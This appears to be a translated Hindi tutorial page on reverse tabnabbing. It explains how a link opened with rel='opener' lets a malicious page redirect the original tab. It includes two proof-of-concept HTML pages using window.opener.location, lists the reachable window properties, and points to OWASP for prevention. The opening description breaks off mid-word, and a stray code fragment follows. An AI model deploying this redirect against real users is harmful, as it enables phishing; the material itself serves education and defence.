विवरण

एक स्थिति में जहाँ एक हमलावर एक <a टैग के href आर्ग्यूमेंट को नियंत्रित कर सकता है जिसमें target="_blank" rel="opener" विशेषता है जिसे किसी पीड़ित द्वारा क्लिक किया जाएगा, तो हमलावर इस लिंक को अपने नियंत्रण वाली वेब पर (एक हानिकारक वेबसाइट) दिखा सकता है। फिर, जब पीड़ित लिंक पर क्लिक करता है और हमलावर की वेबसाइट तक पहुंचता है, तो यह हानिकारक वेबसाइट **जावास्क्रिप्ट ऑब्ज

<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>

<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>

```markup

New Malicious Site

``` ## पहुंचने योग्य गुणसूचियाँ

जब क्रॉस-स्थानीय पहुंचन (विभिन्न डोमेनों के बीच पहुंचन) होती है, तो एक दुर्भाग्यपूर्ण साइट द्वारा पहुंची जा सकने वाली विंडो जावास्क्रिप्ट क्लास उदाहरण की गुणसूचियों को निम्नलिखित तक ही सीमित किया जाता है, जिनमें से कुछ निम्नलिखित हैं:

• opener.closed: इस गुणसूची का उपयोग इसका निर्धारण करने के लिए किया जाता है कि क्या एक विंडो बंद की गई है, जो एक बूलियन मान लौटाता है।

• opener.frames: यह गुणसूची मौजूदा विंडों के सभी आईफ्रेम तत्वों तक पहुंच प्रदान करती है।

• opener.length: इस गुणसूची द्वारा मौजूदा विंडों में मौजूद आईफ्रेम तत्वों की संख्या लौटाई जाती है।

• opener.opener: वर्तमान विंडो को खोलने वाली विंडो का संदर्भ इस गुणसूची के माध्यम से प्राप्त किया जा सकता है।

• opener.parent: यह गुणसूची वर्तमान विंडो के माता-पिता विंडो को लौटाती है।

• opener.self: इस गुणसूची द्वारा वर्तमान विंडो खुद का पहुंच प्रदान किया जाता है।

• opener.top: यह गुणसूची सबसे ऊपरी ब्राउज़र विंडो को लौटाती है।

हालांकि, जब डोमेन समान होते हैं, तो दुर्भाग्यपूर्ण साइट को विंडो जावास्क्रिप्ट ऑब्जेक्ट संदर्भ द्वारा उजागर किए गए सभी गुणसूचियों तक पहुंच मिलती है।

रोकथाम

रोकथाम सूचनाएँ HTML5 Cheat Sheet में दर्ज की गई हैं।

संदर्भ

• https://owasp.org/www-community/attacks/Reverse_Tabnabbing